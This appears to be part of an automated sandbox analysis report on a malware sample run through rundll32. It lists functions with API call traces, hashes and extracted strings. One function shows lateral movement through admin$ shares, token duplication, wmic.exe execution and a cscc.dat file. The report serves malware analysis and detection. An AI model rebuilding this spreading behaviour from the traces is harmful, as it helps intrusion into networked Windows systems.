                                                                      • CreateThread.KERNELBASE(00000000,00000000,0485A333,00000000,00000000,00000000), ref: 0485A454
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04857B89,000000FF), ref: 0485A463
                                                                      • HeapFree.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A466
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocCreateFreeThread
                                                                      • String ID:
                                                                      • API String ID: 3966119241-0
                                                                      • Opcode ID: 944778fba6f0b1186ed37a1384a820a4b7499b4e2a74c30f790aad059a0619b8
                                                                      • Instruction ID: 87ec5faa2cecda75eb7ec5124e8c149bad2eb4f17633bec48b4870a129aad4e0
                                                                      • Opcode Fuzzy Hash: 944778fba6f0b1186ed37a1384a820a4b7499b4e2a74c30f790aad059a0619b8
                                                                      • Instruction Fuzzy Hash: 9FF030B5500319BFD7106FA5ACCCC9BBFACEB85295B108929FA01D7200D578AD04CA60
                                                                      Function 0485636B Relevance: 6.1, APIs: 4, Instructions: 66memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLogicalDrives.KERNELBASE ref: 0485637A
                                                                      • GetDriveTypeW.KERNELBASE(?), ref: 048563B8
                                                                      • LocalAlloc.KERNEL32(00000040,00000050), ref: 048563C7
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04856299,00000000,00000000,00000000), ref: 04856404
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                                      • String ID:
                                                                      • API String ID: 2320387513-0
                                                                      • Opcode ID: 136e65ebeb40e0f2a8c0b5e7164b1e5ea5ea2a21271dff9f40ef66c60bf84add
                                                                      • Instruction ID: 8e567ff3bdc45d70d5f66b33da2a1bae78d6ddf63fc092fb9448c6fa41570221
                                                                      • Opcode Fuzzy Hash: 136e65ebeb40e0f2a8c0b5e7164b1e5ea5ea2a21271dff9f40ef66c60bf84add
                                                                      • Instruction Fuzzy Hash: 53119375A00304EFDB40DFA4D845AAEBBB9FF88711F50C85AE909EB291E734A941CB54
                                                                      Function 0485A112 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0485A18B
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485A194
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0485A199
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485A19C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: e69806d0c1b7207d3e46253969911f369092d32a63daf5f3070d4aaf544c8ac3
                                                                      • Instruction ID: 4ffd1f58937c902ade9ba465897f1aaff8c6499cbdbf3b045660764bbacb8d62
                                                                      • Opcode Fuzzy Hash: e69806d0c1b7207d3e46253969911f369092d32a63daf5f3070d4aaf544c8ac3
                                                                      • Instruction Fuzzy Hash: FF117C72640315AAE711BA69AC80F2B779CEB84760F040B25FD04D7250EB64FD058AF2
                                                                      Function 04857E8E Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 04857E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04857EA6,?), ref: 04857E7C
                                                                      • PathFileExistsW.KERNELBASE(?,?), ref: 04857EB1
                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 04857EC3
                                                                        • Part of subcall function 04856F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04857170,00000000,?,04857AF8), ref: 04856F8E
                                                                        • Part of subcall function 04856F7C: GetProcAddress.KERNEL32(00000000), ref: 04856F95
                                                                        • Part of subcall function 04858313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0485832A
                                                                        • Part of subcall function 04858313: LoadResource.KERNEL32(00000000), ref: 04858341
                                                                        • Part of subcall function 04858313: LockResource.KERNEL32(00000000), ref: 04858350
                                                                        • Part of subcall function 04858313: SizeofResource.KERNEL32(00000000), ref: 04858368
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04858384
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0485838D
                                                                        • Part of subcall function 04858313: memcpy.MSVCRT(00000000,00000002,?,?,00000002), ref: 0485839C
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 048583B9
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 048583BC
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0485840A
                                                                        • Part of subcall function 04858313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0485840D
                                                                        • Part of subcall function 048587E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,048511BB,?,?), ref: 048587FC
                                                                        • Part of subcall function 048587E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,048511BB,?,?), ref: 04858813
                                                                        • Part of subcall function 048587E7: CloseHandle.KERNELBASE(00000000,?,00000000,?,048511BB,?,?), ref: 04858824
                                                                      • ExitProcess.KERNEL32 ref: 04857EFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Resource$File$AllocateHandlePath$AddressCloseCombineCreateCurrentExistsExitFindFreeLoadLockModuleProcSizeofWritememcpy
                                                                      • String ID:
                                                                      • API String ID: 711742280-0
                                                                      • Opcode ID: 54652480e19b68f5546d49213510c5759969002c68c93c764f9c62991e0ebcc6
                                                                      • Instruction ID: 0a6cbd5b39776bde8864d4adc27c3b5798f17abcb94fb12a51f645d454d7e862
                                                                      • Opcode Fuzzy Hash: 54652480e19b68f5546d49213510c5759969002c68c93c764f9c62991e0ebcc6
                                                                      • Instruction Fuzzy Hash: BDF0A472D002196BEF10AAF4DC44DDEB2ACEB08644F404A91AD01E2050E778EE158A61
                                                                      Function 04856FAF Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04857201,?,?,?,04857AF8), ref: 04856FC5
                                                                      • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04857201,?,?,?,04857AF8), ref: 04856FDF
                                                                      • CloseHandle.KERNEL32(00000000,?,?,04857201,?,?,?,04857AF8), ref: 04856FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID:
                                                                      • API String ID: 1065093856-0
                                                                      • Opcode ID: b34872226f97c5cca11fc99aa50b5940b97aba6ab3a5685b79b07562cb92e5d4
                                                                      • Instruction ID: d7252a4b08a3221854d151810b7693d35610d9e366ea6eab4e1ed53fae182432
                                                                      • Opcode Fuzzy Hash: b34872226f97c5cca11fc99aa50b5940b97aba6ab3a5685b79b07562cb92e5d4
                                                                      • Instruction Fuzzy Hash: 2EF05E31601124BADB305E66EC4CEABBE6CEB457F0F408512FD1DD6190D634E941C6E0
                                                                      Function 048587E7 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,048511BB,?,?), ref: 048587FC
                                                                      • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,048511BB,?,?), ref: 04858813
                                                                      • CloseHandle.KERNELBASE(00000000,?,00000000,?,048511BB,?,?), ref: 04858824
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID:
                                                                      • API String ID: 1065093856-0
                                                                      • Opcode ID: a7de5bf90dd2bfaa452c6aeecc2ff030d455ed12d6706c2bc59f82f33a4adcf4
                                                                      • Instruction ID: 9dd2e4ce375570a6464000b89c30a9edda2f461f992fd1508e3672156d9fdd17
                                                                      • Opcode Fuzzy Hash: a7de5bf90dd2bfaa452c6aeecc2ff030d455ed12d6706c2bc59f82f33a4adcf4
                                                                      • Instruction Fuzzy Hash: FDF0A271201124BADB306D56EC4CEEB7E5CEF466F2B108526FD1DC5060D634D951D6E1
                                                                      Function 0485A333 Relevance: 3.8, APIs: 3, Instructions: 48memorysleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(?), ref: 0485A344
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0485A399
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485A3A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcessSleep
                                                                      • String ID:
                                                                      • API String ID: 1803097132-0
                                                                      • Opcode ID: 40b080e40d55f6ae5f374d0968d081e72d62dc3b1a8126d6e7ec4b5764875da9
                                                                      • Instruction ID: 225a16caa908c2d30f5c027ce390f22d4c2106f9f08b5c12a990f6b7ddeb7730
                                                                      • Opcode Fuzzy Hash: 40b080e40d55f6ae5f374d0968d081e72d62dc3b1a8126d6e7ec4b5764875da9
                                                                      • Instruction Fuzzy Hash: 08012C725043066BE710EEB99C84DABB7ACEF84219F440E29AD05D2160EB64F958C7A2
                                                                      Function 0485C4EF Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 308COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: malloc
                                                                      • String ID: @
                                                                      • API String ID: 2803490479-2766056989
                                                                      • Opcode ID: 5e5a39593a171c8ffb335b1a1743c75cee4799fa41ae935cf4f20db1a55186ab
                                                                      • Instruction ID: 29bfd846d9bdbea1957430821e31c6b2b96afb7f8766cf744a2d592404a01c79
                                                                      • Opcode Fuzzy Hash: 5e5a39593a171c8ffb335b1a1743c75cee4799fa41ae935cf4f20db1a55186ab
                                                                      • Instruction Fuzzy Hash: ECC12875A0035A8FCB14CFA8C4845AEBBF1BF89304F144A6AEC11E7360E734AA55CF90
                                                                      Function 0485751B Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 0485754C
                                                                      • NetApiBufferFree.NETAPI32(?), ref: 048575C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BufferEnumFreeServer
                                                                      • String ID:
                                                                      • API String ID: 2429717511-0
                                                                      • Opcode ID: 465752ae96020d888f3ba9c1e3d600c6351a1050cacf2f6b7677acd2eac2e1d3
                                                                      • Instruction ID: 6c45aa4f120e4579d2c2c6da3d739c577926f845e8821066f20eef82a05d5602
                                                                      • Opcode Fuzzy Hash: 465752ae96020d888f3ba9c1e3d600c6351a1050cacf2f6b7677acd2eac2e1d3
                                                                      • Instruction Fuzzy Hash: 272149B6900219EFDB21CF94C844AEEBBB9FB04714F108A16FD15E6160E370B750DB91
                                                                      Function 04857DD0 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04857AA3,?,?,000000FF,?,?), ref: 04857DF6
                                                                      • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04857AA3,?,?,000000FF,?,?), ref: 04857E0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BufferCountFreeInfoServerTick
                                                                      • String ID:
                                                                      • API String ID: 2934114180-0
                                                                      • Opcode ID: abe473bbaf3a52ef4665a5ce4b66e0922edda1a0bbf6aa656c6d57294e1b3905
                                                                      • Instruction ID: ca467701db898af35b61bb2a5879211e2c7dba99774cc7c666b7d401aae9db08
                                                                      • Opcode Fuzzy Hash: abe473bbaf3a52ef4665a5ce4b66e0922edda1a0bbf6aa656c6d57294e1b3905
                                                                      • Instruction Fuzzy Hash: FA118672B003099FE724CE69D885F6EB7AAEB80F50F18CA29ED05DB190E774ED049750
                                                                      Function 04856DA4 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856DB5
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856E0C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 3220a556c04843ff7155c9302a717f04073db0575afe87868ebfb83cfc2c6d2c
                                                                      • Instruction ID: 930645edad51f7b3d8ef83de35eb94adf813b8f7d331c3ce093aa83ae004a6b2
                                                                      • Opcode Fuzzy Hash: 3220a556c04843ff7155c9302a717f04073db0575afe87868ebfb83cfc2c6d2c
                                                                      • Instruction Fuzzy Hash: 1F116935B01A009FC725CF6AC880A5AF7E6FF893147544A29E84AD7321EB31FD118A50
                                                                      Function 04856AA8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • StrCmpIW.KERNELBASE(00000000,?), ref: 04856ABD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb608ae191e47f6e111acb4c342fec6c1bdf451b51838430878aa7003c66327f
                                                                      • Instruction ID: 7d73e6eaccc787f73c9e567f3d0915524486a57f5f6aabf01f8a57b29d6c3374
                                                                      • Opcode Fuzzy Hash: fb608ae191e47f6e111acb4c342fec6c1bdf451b51838430878aa7003c66327f
                                                                      • Instruction Fuzzy Hash: A0D05E3116420DEEEB125E64D808BB83B98E71030AF84C920BD0ED40B0E675A1E8DA40
                                                                      Function 0485C493 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: malloc
                                                                      • String ID:
                                                                      • API String ID: 2803490479-0
                                                                      • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                      • Instruction ID: f6b68f43853c7c4a1e175cb9d1d57efc90aee00baec878968b5cb486e607e705
                                                                      • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                      • Instruction Fuzzy Hash: 22B0123311830D5B9F08EEDCE9C2C5A73DCEAA4524B404906FD1CCF150E971F6104659

                                                                      Non-executed Functions

                                                                      Function 04859B63 Relevance: 73.8, APIs: 35, Strings: 7, Instructions: 296shareprocessthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04859BA5
                                                                        • Part of subcall function 048588D3: PathFindFileNameW.SHLWAPI(04867BC8,75BF73E0,?,048595B2), ref: 048588E3
                                                                      • wsprintfW.USER32 ref: 04859BF2
                                                                      • wsprintfW.USER32 ref: 04859C16
                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 04859C22
                                                                      • wsprintfW.USER32 ref: 04859C41
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04859C59
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 04859C69
                                                                      • GetLastError.KERNEL32 ref: 04859C73
                                                                      • GetLastError.KERNEL32(?), ref: 04859C9A
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04859CDD
                                                                      • GetCurrentThread.KERNEL32 ref: 04859D1B
                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 04859D22
                                                                      • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04859D3C
                                                                      • memset.MSVCRT ref: 04859D62
                                                                      • GetSystemDirectoryW.KERNEL32 ref: 04859D8A
                                                                      • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04859DAA
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 04859DB7
                                                                      • wsprintfW.USER32 ref: 04859DD8
                                                                      • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04859E24
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?,00000104), ref: 04859E2C
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04859E3B
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 04859E4B
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E59
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E63
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E6D
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E77
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E81
                                                                      • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04859E99
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04859EA6
                                                                      • DeleteFileW.KERNEL32(?), ref: 04859EC5
                                                                      • CloseHandle.KERNEL32(?), ref: 04859ED7
                                                                      • CloseHandle.KERNEL32(?), ref: 04859EE4
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000), ref: 048568EB
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 048568F4
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856921
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,74DEE010), ref: 04856946
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 04856949
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856978
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04856995
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 04856998
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0485699F
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 048569A2
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04859EF9
                                                                      • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04859FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04859F17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                                                      • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                                                      • API String ID: 659518118-2685502051
                                                                      • Opcode ID: 1e083ccc9eaea9dbac4401e7aef080f1d6971a319ab9c0400ea1c82f8aa94825
                                                                      • Instruction ID: f8b0926d996780b71ade065ead77b1ac5370cbd0c5be70fb5fc7260262c2abaf
                                                                      • Opcode Fuzzy Hash: 1e083ccc9eaea9dbac4401e7aef080f1d6971a319ab9c0400ea1c82f8aa94825
                                                                      • Instruction Fuzzy Hash: EAB1E9B1D00219EFDF519FA4DC84ADEBBBDEF44304F104AA6E909E2120D778AA84DF51
